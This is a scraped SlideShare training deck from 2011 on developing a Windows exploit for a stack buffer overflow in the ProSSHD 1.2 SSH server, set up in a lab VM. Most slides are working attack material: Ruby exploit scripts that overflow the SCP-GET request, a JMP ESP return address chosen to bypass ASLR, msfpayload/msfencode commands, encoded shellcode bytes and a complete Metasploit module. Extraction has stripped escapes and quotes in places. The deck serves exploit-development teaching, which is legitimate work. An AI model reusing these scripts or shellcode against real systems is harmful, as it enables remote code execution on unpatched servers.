RealWindowsExploitsAllen Harper               1
ProSSHD VulnerabilityBinary can be found at: http://www.exploit-db.com/application/11618	STILL NOT FIXED…0-days still work...
Install ProSSHD in vmware•    Set up W7 vmware client, host only mode.•    Determine vmware client IP.•    Ping vmware cli...
Exploit Development Process•    Crash Program in Debugger•    Control EIP (next instruction)•    Determine Offset of Overw...
Immunity Debugger•  Fork from OllyDbg•  Still looks and feels like OllyDbg•  Adds a Python Command Shell•  Allows for more...
Save Snapshot, Attach Debugger•    In Vmware, save snapshot (prior to sending)•    Send Exploit, with Sleep(15) before sen...
Crash the ProSSHD Server•  From host, crash remote server, control EIP  #prosshd1.rb  %w{rubygems net/ssh net/scp}.each { ...
Determine the Offset(s) •  Revert VM, then use Pattern_Create#prosshd2.rb%w{rubygems net/ssh net/scp}.each { |x| require x...
Determine the Offset(s)•  Attach Debugger to wsshd.exe•  After it loads, hit F9 twice                                  9
Determine the Offset(s)                          10
Determine Op-Codes to Return to •  Determine the Control Vector, we could:   –  JMP ESP   –  RETN •  We choose JMP ESP •  ...
Determine Op-Codes to Return to •  Problem: Vista and beyond protect    NTDLL.DLL with ASLR •  Need to find a non-ASLR mod...
Determine Op-Code Address==================================================================!pvefindaddr v1.32    corelanc0...
Find Space Constraints•  Crash with 2000 A s, calculate depth of   buffer#prosshd3.rb …truncated for brevity…!get_request ...
Select and Test Shellcode•  Generate your shellcode (switching to C)$ msfpayload windows/exec cmd=calc.exe R | msfencode -...
Select and Test ShellcodeNotice: we disabled DEP (/NXCOMPAT)… does not matter here as our vulnerableprogram is not linked ...
Build Exploit Sandwich# prosshd4.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = test1
password = test1 ...
Test Exploit with Debugger•  Run with ruby prosshd4.rb•  Hit F9 twice to hit breakpoint•  Hit F9 to Continue, if crash, th...
Find Bad Characters  •  Revert VM, resend exploit, step through  •  Tip 1: right click on halted instruction, follow in du...
Build new Shellcode# msfpayload windows/exec cmd=calc.exe R | msfencode -b x00x0ax20 -e x86/    shikata_ga_nai -t ruby!# [...
Metasploit Decoders•  Require space on the stack to decode•  Modules use stackadjustment parameter•  You may want to add 1...
Success!•    Revert VM to running state•    Launch Exploit with new shellcode•    Remove xcc, replace with x90, fire off e...
Automating•  Metasploit as you have seen is an   excellent tool for both exploit development   and execution.•  You should...
Metasploit Module Sections•  Header•  Initialize Section ( bad chars, targets)•  Exploit Section (guts of sploit, protocol...
Header##!# $Id: freesshd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $!##!!##!# This file is part of the Metasploit Fr...
Initialize Section    !def initialize(info = {})!    !          !super(update_info(info,!    !          !Name            =...
Exploit Sectiondef exploit!   !       !!   !!     get_request = x41 * 492 + !     [target.ret].pack(‘V’) + !     x90 * 100...
Setup•  Next, install the following rubygems•  Have to run CygShell as Administrator (on older MSF)•  Right click on it in...
Runit•  Restart vulnerable server•  Run Metasploit Console                               29
Armitage Demo                30
Upcoming SlideShare
Loading in …5
×

2011-03 Developing Windows Exploits

758 views

Published on

2011-03 Developing Windows Exploits
by Allen Harper, N2NetSecurity, Inc.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
758
On SlideShare
0
From Embeds
0
Number of Embeds
11
Actions
Shares
0
Downloads
11
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

2011-03 Developing Windows Exploits

  1. 1. RealWindowsExploitsAllen Harper 1
  2. 2. ProSSHD VulnerabilityBinary can be found at: http://www.exploit-db.com/application/11618 STILL NOT FIXED…0-days still work… 2
  3. 3. Install ProSSHD in vmware•  Set up W7 vmware client, host only mode.•  Determine vmware client IP.•  Ping vmware client from host system.•  Install Demo ProSSHD inside vm, run it. 3
  4. 4. Exploit Development Process•  Crash Program in Debugger•  Control EIP (next instruction)•  Determine Offset of Overwrite to EIP•  Determine Opcode to return to (new EIP)•  Determine Space Constraints•  Select and Test Shellcode•  Build Exploit Sandwich•  Determine Bad Characters 4
  5. 5. Immunity Debugger•  Fork from OllyDbg•  Still looks and feels like OllyDbg•  Adds a Python Command Shell•  Allows for more automation•  pvefindaddr is a great plugin tool for exploit development! http://corelan.be•  Note: there was a problem with 1.74•  Current version is 1.80 5
  6. 6. Save Snapshot, Attach Debugger•  In Vmware, save snapshot (prior to sending)•  Send Exploit, with Sleep(15) before send•  File->Attach->wsshd.exe (may need to sort)•  In debugger, hit F9 to continue process 6
  7. 7. Crash the ProSSHD Server•  From host, crash remote server, control EIP #prosshd1.rb %w{rubygems net/ssh net/scp}.each { |x| require x } username = test1 #need to set this up on the test victim (os account) password = test1 #need to set this up on the test victim machine host = 10.10.10.143 port = 22 # use As to overwrite eip get_request = "x41" * 516 # lets do it… Net::SSH.start( host, username, :password => password) do|ssh| sleep(15) # gives us time to attach to wsshd.exe ssh.scp.download!( get_request, "foo.txt )# 2 params:remote,local file end • Run exploit with ruby prosshd1.rb • Attach debugger to wsshd.exe, after it loads, Hit F9 twice 7
  8. 8. Determine the Offset(s) •  Revert VM, then use Pattern_Create#prosshd2.rb%w{rubygems net/ssh net/scp}.each { |x| require x }username = test1 #need to set this up on the test victim (os account)password = test1 #need to set this up on the test victim machinehost = 10.10.10.143port = 22# use As to overwrite eipget_request="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"# lets do it…Net::SSH.start( host, username, :password => password) do|ssh| sleep(15) # gives us time to attach to wsshd.exe ssh.scp.download!( get_request, "foo.txt )# 2 params:remote,local fileend Run exploit with ruby prosshd2.rb 8
  9. 9. Determine the Offset(s)•  Attach Debugger to wsshd.exe•  After it loads, hit F9 twice 9
  10. 10. Determine the Offset(s) 10
  11. 11. Determine Op-Codes to Return to •  Determine the Control Vector, we could: –  JMP ESP –  RETN •  We choose JMP ESP •  Could use msfpescan on ntdll.dll 11
  12. 12. Determine Op-Codes to Return to •  Problem: Vista and beyond protect NTDLL.DLL with ASLR •  Need to find a non-ASLR module •  This is the best way to bypass ASLR •  pvefindaddr is the tool of choice •  Run with !pvefindaddr j –r esp -n in ImmDbg •  Results in file j.txt: •  C:Users[your name here]AppDataLocalVirtualStoreProgram Files Immunity IncImmunity Debugger ! 12
  13. 13. Determine Op-Code Address==================================================================!pvefindaddr v1.32 corelanc0d3r - http://www.corelan.be:8800!-----Loaded modules ---------------------------------------------- !Fixup | Base | Top | Size | SafeSEH | ASLR |NXCompat | Modulename & Path! ----------------------------------------------------------------!NO | 0x7C340000 | 0x7C396000 | 0x00056000 | yes | NO | NO |MSVCR71.dll:C:UsersPublicProgram FilesLab-NCProSSHDMSVCR71.dll!yes | 0x76210000 | 0x762E4000 | 0x000D4000 | yes | yes | yes | kernel32.dll : C:Windowssystem32kernel32.dll!yes | 0x77A50000 | 0x77B8C000 | 0x0013C000 | yes | yes | yes | ntdll.dll : C:WindowsSYSTEM32ntdll.dll !<truncated for brevity>!NO | 0x00400000 | 0x00457000 | 0x00057000 | yes | NO | NO | wsshd.exe : C:UsersPublicProgram FilesLab-NCProSSHDwsshd.exe!<truncated for brevity>!Found push esp - ret at 0x7C345C30 [msvcr71.dll] - [Ascii printable] {PAGE_EXECUTE_READ} [SafeSEH: Yes - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - !C:UsersPublicProgram FilesLab-NCProSSHDMSVCR71.dll
 <truncated for brevity>! 13
  14. 14. Find Space Constraints•  Crash with 2000 A s, calculate depth of buffer#prosshd3.rb …truncated for brevity…!get_request = "x41" * 492 + "x42x42x42x42" + x41 * 2000!•  Run, Attach, Crash, inspect stack for buffer size! 0x0012f758-0x0012ef88= 2000 So we can fit 2000 bytes of shellcode into the buffer! 14
  15. 15. Select and Test Shellcode•  Generate your shellcode (switching to C)$ msfpayload windows/exec cmd=calc.exe R | msfencode -b x00x0a -e x86/shikata_ga_nai –t c sc.txt!!•  Take that shellcode and copy paste into the following harness//shellcode.c char shellcode[] = //copy paste from above!x31xc0x31... your shellcode goes here;!int main() { !//main function !int *ret; !//ret pointer for saved ret ! ret = (int *)ret + 2;! //set ret to point to the saved return! (*ret) = (int)shellcode; //change the saved ret to addr of shellcode!}! 15
  16. 16. Select and Test ShellcodeNotice: we disabled DEP (/NXCOMPAT)… does not matter here as our vulnerableprogram is not linked with /NXCOMPAT by default. 16
  17. 17. Build Exploit Sandwich# prosshd4.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = test1
password = test1 
host = 10.10.10.143
port = 22
shell= # [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1) 
xd9xccx31xc9xb1x33xd9x74x24xf4x5bxbax99xe4x93 +
x62x31x53x18x03x53x18x83xc3x9dx06x66x9ex75x4f +
x89x5fx85x30x03xbaxb4x62x77xcexe4xb2xf3x82x04 + 
x38x51x37x9fx4cx7ex38x28xfax58x77xa9xcax64xdb + 
x69x4cx19x26xbdxaex20xe9xb0xafx65x14x3axfdx3e + 
x52xe8x12x4ax26x30x12x9cx2cx08x6cx99xf3xfcxc6 + 
xa0x23xacx5dxeaxdbxc7x3axcbxdax04x59x37x94x21 + 
xaaxc3x27xe3xe2x2cx16xcbxa9x12x96xc6xb0x53x11 + 
x38xc7xafx61xc5xd0x6bx1bx11x54x6exbbxd2xcex4a + 
x3dx37x88x19x31xfcxdex46x56x03x32xfdx62x88xb5 + 
xd2xe2xcax91xf6xafx89xb8xafx15x7cxc4xb0xf2x21 + 
x60xbax11x36x12xe1x7fxc9x96x9fx39xc9xa8x9fx69 + 
xa1x99x14xe6xb6x25xffx42x48x6cxa2xe3xc0x29x36 + 
xb6x8dxc9xecxf5xabx49x05x86x48x51x6cx83x15xd5 + 
x9cxf9x06xb0xa2xaex27x91xc0x31xbbx79x29xd7x3b + 
x1bx35x1d;
# Overwrite eip with jmp esp (0x7c345c30) of msvcr71.dll
get_request = x41 * 492 + x30x5Cx34x7C + x90 * 1000 + xcc + shell
# lets do it...
Net::SSH.start( host, username, :password = password) do|ssh|
 sleep(15) # gives us time to attach to wsshd.exe
 ssh.scp.download!( get_request, foo.txt) # 2 params: remote file, local file
end ! 17
  18. 18. Test Exploit with Debugger•  Run with ruby prosshd4.rb•  Hit F9 twice to hit breakpoint•  Hit F9 to Continue, if crash, then bad character. 18
  19. 19. Find Bad Characters •  Revert VM, resend exploit, step through •  Tip 1: right click on halted instruction, follow in dump…Shellcode ismangled…why? badchar x0a 19
  20. 20. Build new Shellcode# msfpayload windows/exec cmd=calc.exe R | msfencode -b x00x0ax20 -e x86/ shikata_ga_nai -t ruby!# [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1) !shell = !x33xc9xb1x33xbdxe3x34x37xfbxdbxc6xd9x74x24 +!xf4x5fx31x6fx0fx83xefxfcx03x6fxe8xd6xc2x07 +!x06x9fx2dxf8xd6xc0xa4x1dxe7xd2xd3x56x55xe3 +!x90x3bx55x88xf5xafxeexfcxd1xc0x47x4ax04xee +!x58x7ax88xbcx9ax1cx74xbfxcexfex45x70x03xfe +!x82x6dxebx52x5axf9x59x43xefxbfx61x62x3fxb4 +!xd9x1cx3ax0bxadx96x45x5cx1dxacx0ex44x16xea + !xaex75xfbxe8x93x3cx70xdax60xbfx50x12x88xf1 +!x9cxf9xb7x3dx11x03xffxfaxc9x76x0bxf9x74x81 +!xc8x83xa2x04xcdx24x21xbex35xd4xe6x59xbdxda +!x43x2dx99xfex52xe2x91xfbxdfx05x76x8ax9bx21 +!x52xd6x78x4bxc3xb2x2fx74x13x1ax90xd0x5fx89 +!xc5x63x02xc4x18xe1x38xa1x1axf9x42x82x72xc8 +!xc9x4dx05xd5x1bx2axf9x9fx06x1bx91x79xd3x19 +!xfcx79x09x5dxf8xf9xb8x1exffxe2xc8x1bx44xa5 +!x21x56xd5x40x46xc5xd6x40x25x88x44x08x84x2f +!xecxabxd8xa5 Good list of bad chars: 00 0a 09 20 21 20
  21. 21. Metasploit Decoders•  Require space on the stack to decode•  Modules use stackadjustment parameter•  You may want to add 16 bytes of NOP to beginning of payload to be safe. 21
  22. 22. Success!•  Revert VM to running state•  Launch Exploit with new shellcode•  Remove xcc, replace with x90, fire off exploit•  P0wn3d!!!!! Where do you want to go today! 22
  23. 23. Automating•  Metasploit as you have seen is an excellent tool for both exploit development and execution.•  You should look at existing modules, best way to learn techniques.•  There is no ProSSHD module L•  We will create one and automate our attack! 23
  24. 24. Metasploit Module Sections•  Header•  Initialize Section ( bad chars, targets)•  Exploit Section (guts of sploit, protocol) 24
  25. 25. Header##!# $Id: freesshd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $!##!!##!# This file is part of the Metasploit Framework and may be subject to!# redistribution and commercial restrictions. Please see the Metasploit!# Framework web site for more information on licensing and terms of use.!# http://metasploit.com/framework/!##!!require msf/core!%w{rubygems net/ssh net/scp}.each { |x| require x }!!class Metasploit3 Msf::Exploit::Remote! !Rank = AverageRanking!! !include Msf::Exploit::Remote::Tcp! 25
  26. 26. Initialize Section !def initialize(info = {})! ! !super(update_info(info,! ! !Name = ProSSHD 1.2.x SCP-GET Buffer Overflow,! ! !Description = %q{! ! !This module exploits a simple stack buffer overflow in ProSSHD 1.2.! ! !This flaw is due to a buffer overflow error when handling a specially! ! !crafted scp get request from an SSH client.! ! !**Based on original Exploit by S2 Crew [Hungary]! ! !},! ! !Author = AAH,! ! !License = MSF_LICENSE,! ! !Version = $Revision: 10000 $,! ! !References = [],! ! !DefaultOptions = {EXITFUNC = process ,},! ! !Payload = {Space = 1000,! ! ! ! BadChars = x00x09x0ax20x21,! ! ! ! StackAdjustment = -3500,},! ! !Platform = win,! ! !Targets = [[ Windows 7, { Ret = 0x7c345c30 } ],],! ! !Privileged = true,! ! !DisclosureDate = March 3, 2010,! ! !DefaultTarget = 0))! ! !register_options([ ! OptString.new(USERNAME, [ true, The username to authenticate as ]), ! ! OptString.new(PASSWORD, [ true, The password for the specified username ]),! ! ! Opt::RPORT(22)], self.class)! !end!! 26
  27. 27. Exploit Sectiondef exploit! ! !! !! get_request = x41 * 492 + ! [target.ret].pack(‘V’) + ! x90 * 1000 +! !payload.encoded # shellcode 8)! ! ! ! !print_status(Trying to connect to #{datastore[RHOST]}...)! ! !! ! !# lets do it...! ! !Net::SSH.start( datastore[RHOST], datastore[USERNAME], :password = datastore [PASSWORD]) do|ssh|! ! ! #sleep(15) # gives us time to attach to wsshd.exe! ! print_status(Sending sploit to #{datastore[RHOST]}...)! ! ! ssh.scp.download!( get_request, foo.txt) # 2 params: remote file, local file! ! !end! ! !handler! !end!end!! 27
  28. 28. Setup•  Next, install the following rubygems•  Have to run CygShell as Administrator (on older MSF)•  Right click on it in start menu, select run as Administrator 28
  29. 29. Runit•  Restart vulnerable server•  Run Metasploit Console 29
  30. 30. Armitage Demo 30

×